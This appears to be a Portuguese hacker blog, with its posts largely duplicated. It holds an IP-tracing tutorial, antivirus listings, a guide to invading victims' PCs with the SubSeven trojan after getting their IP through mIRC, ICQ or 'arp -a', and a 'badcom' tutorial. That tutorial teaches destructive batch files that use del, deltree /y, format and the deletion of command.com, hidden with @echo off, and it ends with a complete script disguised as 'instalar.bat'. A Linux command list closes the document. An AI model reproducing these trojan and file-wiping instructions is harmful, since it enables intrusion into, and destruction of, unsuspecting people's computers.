http://www.maxmind.com/app/lookup 30 set (4 dias atrás) kakashi.ex3
parte 8
rastreando ip (tutorial)
8 parte
8 parte
- sabendo a nacionalidade:
* se for nacional:
1) consulte no www.registro.br
2) se constatar que o ip não está registrado, pesquise novamente em http://www.ipgeo.com.br
3) tendo o cep em mãos, consulte ele http://www.correios.com.br/servicos/cep/cep_cep.cfm
* caso seja internacional:
1) busque primeiro no whois: http://whois.lacnic.net
2) senão retornar nada útil tente em: http://www.maxmind.com/app/lookup_city
3) descoberto o país, consulte em http://www.embassyworld.com/data/zip_codes.html
4) acesse algum dos sites da lista referente ao país do ip
5) busque pelo código postal localizado
6) caso seja americano, uma boa dica é procurar no google maps
bomm é essu ae...
AntiVirus
anti-macro
anti-vírus especializado em eliminar vírus de macro.
programa: freeware
panda quick remover
elimina vários vírus de classe worm, inclusive o temido klez h.
for windows 95/98/me/xp/nt/2000. programa freeware.
avdisk
habilita criação automática de anti-vírus discos do startup usando software anti-vírus popular (f-prot, avplite, avpdos32) que pode estar utilizado para começar e desinfecta computadores. o programa é fácil para usar e ajuda básica é incluida para cada produto de apoio. for win 95/98/me/xp/nt/2000
bitdefender 6.2
elimine os vírus que estão atacando seu computador. este antivírus, segundo o autor, foi feito especialmente para usuários domésticos, pois é fácil de usar e se atualiza automáticamente. você instala e até esquece que está lá. protege os e-mails, downloads, discos, etc. possui quarentena para arquivos estranhos e escaneia o hd em busca de vírus.
roda em windows 95, 98, nt, 2000, me, xp. programa shareware.
f-prot professional anti-virus toolkit
f-prot é um poderoso antivírus que oferece uma grande variedade de opções para proteger seu computador contra os vírus mais recentes. utilizando este programa, você poderá utar programas e trabalhar tranqüilo, sem a constante preocupação com a velocidade de propagação dos vírus da informática. for win 95/98/nt/me/2000/xp.
kaspersky anti-vírus
Ótimo anti-vírus. requer cadastro no site do fabricante antes do download. for win 95/98/me/nt/2000/xp. programa shareware.
anti-vírus hackers action 1.0
verifica e elimina 6 tipos de vírus. programa freeware. for win 95/98/me
júnior protection remover 3.0
software que ensina vc a se proteger dos vírus e worms mais perigosos da internet e também a remove-los. for win 95/98/me/2000/nt, programa freeware - tamanho 1.28 mb
sbabr
protege o setor de boot do micro contra vírus. os: dos license: shareware size: 534 kb
mailwall
intercepta mensagem infectadas que estão sendo enviadas para o seu e-mail.
for windows 95/98/me/nt/2000. license: 30-day trial
perforin for winword
scanneia seu micro a procura de vírus de macro. os: windows 95/98/me/nt/2000/me license: 30-day trial
norton antivirus command-line scanner (navc)
remove vírus de dos-based.
os: dos license: freeware size: 1.50 mb
rav antivirus desktop
remove todo tipo de vírus. os: windows 95/98/me/nt/2000 license: 30-day trial size: 11.06 mb
virus checking assistant
verifica se tem vírus nos arquivos zipados que vc acaba de baixar para o seu micro.
os: windows 95/98/me license: shareware size: 1.01 mb
proland softwarepvt ltd
anti-vírus pouco conhecido no brasil.win 95/98/nt.
virus trap
Ótimo anti-vírus, totalmente gratuito.win 95/98/nt.
ultimate killer virus vaccine v1.00
anti- vírus não muito conhecido no brasil. win 95/98/nt.
mooutlooksecurity
protege sus caixa de e-mail contra vírus, trojans, worms etc... for win 95/98/me/2000, programa freeware
anti-vírus especializado em eliminar vírus de macro.
programa: freeware
panda quick remover
elimina vários vírus de classe worm, inclusive o temido klez h.
for windows 95/98/me/xp/nt/2000. programa freeware.
avdisk
habilita criação automática de anti-vírus discos do startup usando software anti-vírus popular (f-prot, avplite, avpdos32) que pode estar utilizado para começar e desinfecta computadores. o programa é fácil para usar e ajuda básica é incluida para cada produto de apoio. for win 95/98/me/xp/nt/2000
bitdefender 6.2
elimine os vírus que estão atacando seu computador. este antivírus, segundo o autor, foi feito especialmente para usuários domésticos, pois é fácil de usar e se atualiza automáticamente. você instala e até esquece que está lá. protege os e-mails, downloads, discos, etc. possui quarentena para arquivos estranhos e escaneia o hd em busca de vírus.
roda em windows 95, 98, nt, 2000, me, xp. programa shareware.
f-prot professional anti-virus toolkit
f-prot é um poderoso antivírus que oferece uma grande variedade de opções para proteger seu computador contra os vírus mais recentes. utilizando este programa, você poderá utar programas e trabalhar tranqüilo, sem a constante preocupação com a velocidade de propagação dos vírus da informática. for win 95/98/nt/me/2000/xp.
kaspersky anti-vírus
Ótimo anti-vírus. requer cadastro no site do fabricante antes do download. for win 95/98/me/nt/2000/xp. programa shareware.
anti-vírus hackers action 1.0
verifica e elimina 6 tipos de vírus. programa freeware. for win 95/98/me
júnior protection remover 3.0
software que ensina vc a se proteger dos vírus e worms mais perigosos da internet e também a remove-los. for win 95/98/me/2000/nt, programa freeware - tamanho 1.28 mb
sbabr
protege o setor de boot do micro contra vírus. os: dos license: shareware size: 534 kb
mailwall
intercepta mensagem infectadas que estão sendo enviadas para o seu e-mail.
for windows 95/98/me/nt/2000. license: 30-day trial
perforin for winword
scanneia seu micro a procura de vírus de macro. os: windows 95/98/me/nt/2000/me license: 30-day trial
norton antivirus command-line scanner (navc)
remove vírus de dos-based.
os: dos license: freeware size: 1.50 mb
rav antivirus desktop
remove todo tipo de vírus. os: windows 95/98/me/nt/2000 license: 30-day trial size: 11.06 mb
virus checking assistant
verifica se tem vírus nos arquivos zipados que vc acaba de baixar para o seu micro.
os: windows 95/98/me license: shareware size: 1.01 mb
proland softwarepvt ltd
anti-vírus pouco conhecido no brasil.win 95/98/nt.
virus trap
Ótimo anti-vírus, totalmente gratuito.win 95/98/nt.
ultimate killer virus vaccine v1.00
anti- vírus não muito conhecido no brasil. win 95/98/nt.
mooutlooksecurity
protege sus caixa de e-mail contra vírus, trojans, worms etc... for win 95/98/me/2000, programa freeware
Como Invadir
como invadir
invasão por ip
para fazer uma invasão por ip você deve pegar o ip da vítima. mas como pegar o ip da vítima? se você for invadir uma vítima que esteja usando mirc, você deve fazer com que o cara te envie um chat ou um send. pelo chat é só você ficar atento na janela do chat, quando o mirc estabelece conexão ele mostra o ip do cara dentro de parênteses, assim (200.253.184.64). pelo send, você tem que fazer com que a vítima te mande um arquivo, dai você vai na janela do status e vê um ip na cor vermelha também entre parênteses aparecendo na hora que ele te manda. não é aconselhável que você espere acabar o envio da vítima, pois pode estar infectado.
se você for invadir uma pessoa que esteja usando icq, você deve clicar em cima do usuário e ir na opção info, na parte onde diz current / last ip tem dizendo o ip da vítima. mas se aparecer n/a é porque o cara quando foi configurar o icq escolheu a opção don't publish my ip.
nesse caso, se você nem conseguir fazer com que o cara te mande um chat ou um send pelo mirc ou se aparecer a ao invés de ip no icq aparecer n/a ai você vai ter que fazer uma técnica mais complexa. É assim: você faz com que o cara te manda umas 2 ou 3 mensagens pelo mirc ou pelo icq e vai correndo para o prompt do ms-dos e digita: arp -a daí o vai aparecer o ip de todas as pessoas que estão te mandando mensagens no momento. apartir dai vai um pouco mais difícil. você pega um trojan na sessão trojan's. supomos que você vai invadir pelo subseven, e então você manda para a vítima o arquivo server.exe, faça com que o ele ute-o, abra o subseven.exe, coloque o ip da vítima lá e clique em conect. atenção, não mude a porta padrão (1243) do subseven. se aparecer lá embaixo conected .bla.bla.bla. você já pode torrar o h.d.d (hard disk drive)do cara.
(Kra Nao Aconselho a fazer isso nao so ensinei , se vc se der mal o problema eh teu pq iss eh crime logo aviso eu nao pago por seus atos!)
invasão por ip
para fazer uma invasão por ip você deve pegar o ip da vítima. mas como pegar o ip da vítima? se você for invadir uma vítima que esteja usando mirc, você deve fazer com que o cara te envie um chat ou um send. pelo chat é só você ficar atento na janela do chat, quando o mirc estabelece conexão ele mostra o ip do cara dentro de parênteses, assim (200.253.184.64). pelo send, você tem que fazer com que a vítima te mande um arquivo, dai você vai na janela do status e vê um ip na cor vermelha também entre parênteses aparecendo na hora que ele te manda. não é aconselhável que você espere acabar o envio da vítima, pois pode estar infectado.
se você for invadir uma pessoa que esteja usando icq, você deve clicar em cima do usuário e ir na opção info, na parte onde diz current / last ip tem dizendo o ip da vítima. mas se aparecer n/a é porque o cara quando foi configurar o icq escolheu a opção don't publish my ip.
nesse caso, se você nem conseguir fazer com que o cara te mande um chat ou um send pelo mirc ou se aparecer a ao invés de ip no icq aparecer n/a ai você vai ter que fazer uma técnica mais complexa. É assim: você faz com que o cara te manda umas 2 ou 3 mensagens pelo mirc ou pelo icq e vai correndo para o prompt do ms-dos e digita: arp -a daí o vai aparecer o ip de todas as pessoas que estão te mandando mensagens no momento. apartir dai vai um pouco mais difícil. você pega um trojan na sessão trojan's. supomos que você vai invadir pelo subseven, e então você manda para a vítima o arquivo server.exe, faça com que o ele ute-o, abra o subseven.exe, coloque o ip da vítima lá e clique em conect. atenção, não mude a porta padrão (1243) do subseven. se aparecer lá embaixo conected .bla.bla.bla. você já pode torrar o h.d.d (hard disk drive)do cara.
(Kra Nao Aconselho a fazer isso nao so ensinei , se vc se der mal o problema eh teu pq iss eh crime logo aviso eu nao pago por seus atos!)
Comandos BADCOM!
o que é um comando badcon?
É um arquivo de extensão .bat que podem ser nocivos ou não... podem até ser considerados vírus, porém é claro que os vírus mesmo são mais complexos e feitos por linguagens de programação ou com viruslab's.
como eu faço??
você pode fazer no edit do ms-dos ou no notepad do windows... os badcons são feitos basicamente de comandos do ms-dos.
--------------------------------------------------------------------------------
abaixo estão os comandos badcons. divirta-se!
--------------------------------------------------------------------------------
@echo off
este comando "esconde" a ação!! por exemplo, se você escrever del *.* com o @echo off a vítima vai pensar que nada aconteceu, mas se você não pôr o @echo off ela vai ver o que está acontecendo e vai ter tempo de desligar o computador!! (indispensável num badcon!).
cls
"limpa a tela". por exemplo, se você quiser que não apareça nada quando a vítima utar o badcon.
ex.: @echo off
del *.*
cd windows
del *.com
del *.ini
cls
echo
este comando "mandar mensagens" para o indivíduo, por exemplo, se você escrever:
@echo off
echo olá!! seu computador acaba de ser invadido por [serialkiller].
o badcon exibirá a seguinte mensagem:
olá!! seu computador acaba de ser invadido por serialkiller.
cd
este comando serve para "criar" diretórios, exemplo:
md hackerianø´§™
cria o diretório hackerianø´§™
copy
serve para "copiar" arquivos, exemplo:
copy c:*.* c:windows
ele copiará todos os arquivos soltos em c: (menos os diretórios) para c:windows
del
"apaga" arquivos determinados, exemplo:
@echo off
cdwindows
del win.com
com estes comandos ele deletará arquivos determinados, no caso o win.com, que é indispensável para funcionar o windows. sem ele não dá para iniciar o windows.
< cellspacing="0" bgcolor="#ff0000" border="0">
"apaga os diretórios" existentes dentro de outros diretórios, exemplo:
deltree/y c:
ele apagará todos o diretórios existentes em c: ao contrário do del *.* que só apagaria os arquivos soltos em c:.
aí você me pergunta: por que o /y depois do deltree?? quando você dá um deltree, ele pegunta se quer realmente apagar determinado arquivo, mas com este /y o bug não existe mais e ele apagará os arquivos direto sem perguntar a vítima!!! (comando muito perigoso)
rd
comando para "desfazer diretórios" vazios no bad-com, exemplo:
rd hackerianø´§™
desfaz o diretório hackerianø´§™
boot
"escreva na ultima linha do bad-com boot "
e também deixe o arquivo com o nome de boot
terá uma bela surpresa o badcon parecerá um elevador......!!!
ren
"renomeia" um arquivo especificado, exemplo:
ren auto.bat hackerianø´§™
o arquivo está renomeado para hackerianø´§™.
format
com este comando é usado para "formatar" discos como o c: ou o a:. porém, não é muito bom usar este comando por causa do bug da pergunta!!
use-o apenas com pessoas burrinhas, e que não saibam o que é este comando!
choice
comando que "possibilita um prompt para resposta".
exemplo: choice /c123456789
para números ou letras é necessário o uso do /c, sem o uso do comando /c
somente choice, mostrará o prompt: [y,n]...
com o /c e os números irá mostrar: [1,2,3,4,5,6,7,8,9]...
o comando choice tem que vir sempre acompanhado do if e errorlevel.
if e errorlevel é um complemento usado pelo choice
comando que possibilita o desenvolvimento de questões e prompts para o sacaniado
os comandos choice e if errorlevel são comandos que um precisa do outro.
nenhum se mantém sozinho.
doskey
o doskey serve para "trocar" um comando por outro. exemplo: doskey comando comando
doskey dir cls
sempre que a vitima digitar dir sera utado o comando cls.
goto
serve para "ir" para determinado ponto do arquivo, exemplo:
loop (local onde o comando goto retornará)
dir
goto loop
com isso o programa ficará dando dir eternamente
if exist
"checa para ver se existe" determinado arquivo, e se existir realiza uma função, se não existir realiza uma outra finção. exemplo:
cd windows entra no diretorio windows
if exist win.com goto win: procura pelo arquivo win.com, se existir ele vai para o win:, se não ele vai para linha seguinte.
cd win-95 como não existia o diretorio windows, ele vai tentar o win-95
if exist win.com goto win:
goto fim: vai para o fim:
win:
del win.com deleta o win.com
fim: fim do arquivo
sabendo estes comandos já podemos fazer o nosso 1° badcon:
entre no edit do ms-dos ou no notepad do windows e digite os comandos abaixo e salve como innstalar.bat.
nunca, nunca esqueça que o arquivo deve ser salvo com a extensão .bat.
@echo off
cd -----------------------> vai para a unidade de disco c:
cd windows -------------------> entra no diretório windows
del *.com ---------------------> deleta todos os arquivos com extensão .com
del *.sys ---------------------> deleta todos os arquivos com extensão .sys
cd -----------------------> volta para a raiz de c:
del auto.bat --------------------> deleta o arquivo auto.bat (o de inicialização do computador)
del command.com -------------------> deleta o arquivo command.com (o do ms-dos)
echo seu computador acabou de ser invadido por serial killer ----------> exibirá a mensagem digitada
pronto a bomba está feita e para uta-lá é só digitar: instalar.bat, mas cuidado nunca teste os badcons no seu computador, a não ser que sejam inofensivos
caso esteja tendo problemas para fazer um comando badcon clique aqui para download do programa já feito!
deltree
(lembrando seus atos suas responsabilidades!)
É um arquivo de extensão .bat que podem ser nocivos ou não... podem até ser considerados vírus, porém é claro que os vírus mesmo são mais complexos e feitos por linguagens de programação ou com viruslab's.
como eu faço??
você pode fazer no edit do ms-dos ou no notepad do windows... os badcons são feitos basicamente de comandos do ms-dos.
--------------------------------------------------------------------------------
abaixo estão os comandos badcons. divirta-se!
--------------------------------------------------------------------------------
@echo off
este comando "esconde" a ação!! por exemplo, se você escrever del *.* com o @echo off a vítima vai pensar que nada aconteceu, mas se você não pôr o @echo off ela vai ver o que está acontecendo e vai ter tempo de desligar o computador!! (indispensável num badcon!).
cls
"limpa a tela". por exemplo, se você quiser que não apareça nada quando a vítima utar o badcon.
ex.: @echo off
del *.*
cd windows
del *.com
del *.ini
cls
echo
este comando "mandar mensagens" para o indivíduo, por exemplo, se você escrever:
@echo off
echo olá!! seu computador acaba de ser invadido por [serialkiller].
o badcon exibirá a seguinte mensagem:
olá!! seu computador acaba de ser invadido por serialkiller.
cd
este comando serve para "criar" diretórios, exemplo:
md hackerianø´§™
cria o diretório hackerianø´§™
copy
serve para "copiar" arquivos, exemplo:
copy c:*.* c:windows
ele copiará todos os arquivos soltos em c: (menos os diretórios) para c:windows
del
"apaga" arquivos determinados, exemplo:
@echo off
cdwindows
del win.com
com estes comandos ele deletará arquivos determinados, no caso o win.com, que é indispensável para funcionar o windows. sem ele não dá para iniciar o windows.
< cellspacing="0" bgcolor="#ff0000" border="0">
"apaga os diretórios" existentes dentro de outros diretórios, exemplo:
deltree/y c:
ele apagará todos o diretórios existentes em c: ao contrário do del *.* que só apagaria os arquivos soltos em c:.
aí você me pergunta: por que o /y depois do deltree?? quando você dá um deltree, ele pegunta se quer realmente apagar determinado arquivo, mas com este /y o bug não existe mais e ele apagará os arquivos direto sem perguntar a vítima!!! (comando muito perigoso)
rd
comando para "desfazer diretórios" vazios no bad-com, exemplo:
rd hackerianø´§™
desfaz o diretório hackerianø´§™
boot
"escreva na ultima linha do bad-com boot "
e também deixe o arquivo com o nome de boot
terá uma bela surpresa o badcon parecerá um elevador......!!!
ren
"renomeia" um arquivo especificado, exemplo:
ren auto.bat hackerianø´§™
o arquivo está renomeado para hackerianø´§™.
format
com este comando é usado para "formatar" discos como o c: ou o a:. porém, não é muito bom usar este comando por causa do bug da pergunta!!
use-o apenas com pessoas burrinhas, e que não saibam o que é este comando!
choice
comando que "possibilita um prompt para resposta".
exemplo: choice /c123456789
para números ou letras é necessário o uso do /c, sem o uso do comando /c
somente choice, mostrará o prompt: [y,n]...
com o /c e os números irá mostrar: [1,2,3,4,5,6,7,8,9]...
o comando choice tem que vir sempre acompanhado do if e errorlevel.
if e errorlevel é um complemento usado pelo choice
comando que possibilita o desenvolvimento de questões e prompts para o sacaniado
os comandos choice e if errorlevel são comandos que um precisa do outro.
nenhum se mantém sozinho.
doskey
o doskey serve para "trocar" um comando por outro. exemplo: doskey comando comando
doskey dir cls
sempre que a vitima digitar dir sera utado o comando cls.
goto
serve para "ir" para determinado ponto do arquivo, exemplo:
loop (local onde o comando goto retornará)
dir
goto loop
com isso o programa ficará dando dir eternamente
if exist
"checa para ver se existe" determinado arquivo, e se existir realiza uma função, se não existir realiza uma outra finção. exemplo:
cd windows entra no diretorio windows
if exist win.com goto win: procura pelo arquivo win.com, se existir ele vai para o win:, se não ele vai para linha seguinte.
cd win-95 como não existia o diretorio windows, ele vai tentar o win-95
if exist win.com goto win:
goto fim: vai para o fim:
win:
del win.com deleta o win.com
fim: fim do arquivo
sabendo estes comandos já podemos fazer o nosso 1° badcon:
entre no edit do ms-dos ou no notepad do windows e digite os comandos abaixo e salve como innstalar.bat.
nunca, nunca esqueça que o arquivo deve ser salvo com a extensão .bat.
@echo off
cd -----------------------> vai para a unidade de disco c:
cd windows -------------------> entra no diretório windows
del *.com ---------------------> deleta todos os arquivos com extensão .com
del *.sys ---------------------> deleta todos os arquivos com extensão .sys
cd -----------------------> volta para a raiz de c:
del auto.bat --------------------> deleta o arquivo auto.bat (o de inicialização do computador)
del command.com -------------------> deleta o arquivo command.com (o do ms-dos)
echo seu computador acabou de ser invadido por serial killer ----------> exibirá a mensagem digitada
pronto a bomba está feita e para uta-lá é só digitar: instalar.bat, mas cuidado nunca teste os badcons no seu computador, a não ser que sejam inofensivos
caso esteja tendo problemas para fazer um comando badcon clique aqui para download do programa já feito!
deltree
(lembrando seus atos suas responsabilidades!)
Comandos De Linux!
Is - Lista os arquivos, mesmo que dir do DOS
Atributos comuns: -a = mostra arquivos ocultos
-l - mostra bytes, permissões, diretório, etc
Obs.: no ls os nomes de arquivos nos sistemas *X (Unix, linux, etc) não
precisam ter só 8 letras. Daí, se você quer listar os arquivos comecados
com u, por exemplo, peca ls u* e veja o resultado.
* substitui qualquer conjunto de caracteres
? substitui caracteres isolados
rm: remove arquivos, no formato: rm (arquivo1) (arquivo2) (arquivo3) ...
Exemplo: rm eu.doc / rm leiame.txt manual.html win95.w95
cp: copia arquivos, no formato: cp (arquivo1) (diretório)
Exemplo: cp manual.txt /home/manual
cat: mostra o conteudo do arquivo, mesmo que o 'type' no DOS
more: exibe o conteudo de um arquivo pagina a pagina, mesmo q no DOS
Exemplo: ls|more
pwd: exibe o diretório atual (o que vc esta)
rmdir: apaga diretório
Exemplo: rmdir /diretório
se o diretório estiver cheio, use o rm com o atributo -r
mkdir: cria diretório
Exemplo: mkdir /diretório
awk: Procura por um modelo a partir de um arquivo. Inclui uma linguagem de programação embutida.
bdiff: Compara dois arquivos grandes.
bfs: Procura um arquivo grande.
cal: Exibe um calendario.
cat: Encadeia e imprimi arquivos.
cc: Compilador C.
cd: Muda diretório.
chgrp: Muda o título de um grupo de arquivos.
cmp: Compara dois arquivos; mostra a localizacao (linha e byte) da primeira diferenca entre eles.
comm: Compara dois arquivos para determinar quais linhas sao comuns entre eles.
cu: Chamar outro sistema UNIX.
date: Retorna a data e a hora.
diff: Exibe as diferencas entre dois arquivos ou diretórios.
diff3: Exibe as diferencas entre tres arquivos ou diretórios.
du: Relatorio no uso do sistema de arquivos.
echo: Exibe seus argumentos.
ed: Editor de texto.
ex: Editor de texto.
expr: Avalia seus argumentos quando geralmente e uma formula matematica.
f77: Compilador FORTRAN.
find: Localiza os arquivos c/ caracteristicas especificas.
format: Inicializa um floppy disk.
grep: Procura um modelo a partir de um arquivo. (veja awk)
help: Ajuda da shell atual
kill: Termina um processo.
ln: Usado para unir arquivos.
lpr: Copia um arquivo para a linha de impressora.
ls: Exibe informacoes sobre um ou mais arquivos.
mail: Usado para receber ou enviar e-mail.
nroff: Usado para formatar textos.
ps: Exibe um status dos processos.
sleep: Causa um processo para tornar-se inativo por uma duracao de tempo especifica.
sort: Escolher e unir um ou mais arquivos.
spell: Procurar erros de ortografia num arquivo.
split: Dividir um arquivo.
stty: Exibir ou escolher parametros do terminal.
tail: Exibir o fim de um arquivo.
tset: Escolher Obrigado(a), tipo de terminal.
umask: Permite que o usuário especifique uma nova criacao de camuflagem
Atributos comuns: -a = mostra arquivos ocultos
-l - mostra bytes, permissões, diretório, etc
Obs.: no ls os nomes de arquivos nos sistemas *X (Unix, linux, etc) não
precisam ter só 8 letras. Daí, se você quer listar os arquivos comecados
com u, por exemplo, peca ls u* e veja o resultado.
* substitui qualquer conjunto de caracteres
? substitui caracteres isolados
rm: remove arquivos, no formato: rm (arquivo1) (arquivo2) (arquivo3) ...
Exemplo: rm eu.doc / rm leiame.txt manual.html win95.w95
cp: copia arquivos, no formato: cp (arquivo1) (diretório)
Exemplo: cp manual.txt /home/manual
cat: mostra o conteudo do arquivo, mesmo que o 'type' no DOS
more: exibe o conteudo de um arquivo pagina a pagina, mesmo q no DOS
Exemplo: ls|more
pwd: exibe o diretório atual (o que vc esta)
rmdir: apaga diretório
Exemplo: rmdir /diretório
se o diretório estiver cheio, use o rm com o atributo -r
mkdir: cria diretório
Exemplo: mkdir /diretório
awk: Procura por um modelo a partir de um arquivo. Inclui uma linguagem de programação embutida.
bdiff: Compara dois arquivos grandes.
bfs: Procura um arquivo grande.
cal: Exibe um calendario.
cat: Encadeia e imprimi arquivos.
cc: Compilador C.
cd: Muda diretório.
chgrp: Muda o título de um grupo de arquivos.
cmp: Compara dois arquivos; mostra a localizacao (linha e byte) da primeira diferenca entre eles.
comm: Compara dois arquivos para determinar quais linhas sao comuns entre eles.
cu: Chamar outro sistema UNIX.
date: Retorna a data e a hora.
diff: Exibe as diferencas entre dois arquivos ou diretórios.
diff3: Exibe as diferencas entre tres arquivos ou diretórios.
du: Relatorio no uso do sistema de arquivos.
echo: Exibe seus argumentos.
ed: Editor de texto.
ex: Editor de texto.
expr: Avalia seus argumentos quando geralmente e uma formula matematica.
f77: Compilador FORTRAN.
find: Localiza os arquivos c/ caracteristicas especificas.
format: Inicializa um floppy disk.
grep: Procura um modelo a partir de um arquivo. (veja awk)
help: Ajuda da shell atual
kill: Termina um processo.
ln: Usado para unir arquivos.
lpr: Copia um arquivo para a linha de impressora.
ls: Exibe informacoes sobre um ou mais arquivos.
mail: Usado para receber ou enviar e-mail.
nroff: Usado para formatar textos.
ps: Exibe um status dos processos.
sleep: Causa um processo para tornar-se inativo por uma duracao de tempo especifica.
sort: Escolher e unir um ou mais arquivos.
spell: Procurar erros de ortografia num arquivo.
split: Dividir um arquivo.
stty: Exibir ou escolher parametros do terminal.
tail: Exibir o fim de um arquivo.
tset: Escolher Obrigado(a), tipo de terminal.
umask: Permite que o usuário especifique uma nova criacao de camuflagem
Assinar:
Postagens (Atom)